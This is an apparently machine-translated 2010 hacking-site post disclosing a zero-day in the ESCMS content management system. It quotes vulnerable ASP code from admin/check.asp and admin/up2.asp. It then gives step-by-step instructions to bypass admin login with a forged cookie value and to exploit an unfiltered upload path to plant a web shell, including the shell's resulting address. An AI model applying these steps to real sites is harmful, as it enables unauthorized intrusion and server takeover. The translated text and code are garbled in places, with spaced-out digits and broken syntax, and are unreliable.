ESCMS vulnerability website system 0day-vulnerability warning-the black bar safety net

2010-02-25T00:00:00
ID MYHACK58:62201026228
Type myhack58
Reporter 佚名
Modified 2010-02-25T00:00:00

Description

Version:ESCMS V1. 0 SP1 Build 1 1 2 5 Background login authentication is through the admin/check. asp achieved,look at the code

<% if Request. cookies(CookiesKey)("ES_admin")="" then 'Note that here Oh,he is by COOKIE validation ES_admin is empty,we can forge a value,called he is not empty 'CookiesKey in the inc/ESCMS_Config. asp file,the default is ESCMS$_SP2 Call Err_Show() Response. End() End if ...... %> 首先 我们 打开 http://target.com/admin/es_index.html

And then in the COOKIE end with ; ESCMS$_SP2=ES_admin=st0p;

Modify,then refresh

Into the background of the GA..

Then...mention the right,Hey, Hey,admin/up2. asp,Upload Directory parameter filepath filter LAX,can lead to truncation of the directory,to generate SHELL,look at the code

...... formPath=upload. form("filepath") 'here there is no filter if formPath="" then formPath="../Upfile" end if Dim formPath1 formPath1="Upfile/" 'In the directory after the(/) if right(formPath,1)<>"/" then formPath=formPath&"/" end if for each formName in upload. file 'lists all the uploaded files set file=upload. file(formName) 'generate a file object if file. filesize<1 0 0 then response. write "Please first choose which you want to upload the pictures! [ <a href=# onclick=history. go(-1)>please re-upload</a> ]" response. end end if

fileExt=lcase(file. FileExt) if CheckFileExt(fileEXT)=false then response. write "File format is not valid! [ <a href=# onclick=history. go(-1)>please re-upload</a> ]" response. end end if

'randomize ranNum=int(9 0 0 0 0*rnd)+1 0 0 0 0 Dim tempname,temppath tempname=year(now)&month(now)&day(now)&hour(now)&minute(now)&second(now)&ranNum&"."& amp;fileExt temppath=formPath1&tempname filename=formPath&tempname if file. FileSize>0 then 'if FileSize > 0 Description there is a file data result=file. SaveToFile(Server. mappath(filename)) 'save the file,this address will become our truncation of the SHELL name ......

Using the method,you can capture,then change it,NC upload,you can also directly use DOMAIN tools such as submit.

Hey,success,shell address is http://target. com/admin/diy. asp The presence of this upload there are admin/downup. asp,however it seems like the author's negligence,there is no reference to inc/ESCMS_Config. asp,lead to open this page fails..

In the version of the ESCMS V1. 0 official version,the presence of the same upload problem admin/up2. asp and admin/downup. asp are available,but cookies trick can not be used,because this version use the session to authenticate the login...

Day Ah,yet another YD hole out,but like online,and more is ESCMS V1. 0 official version of the..... The latest version is I added the author's group under the,the official station of the download failure...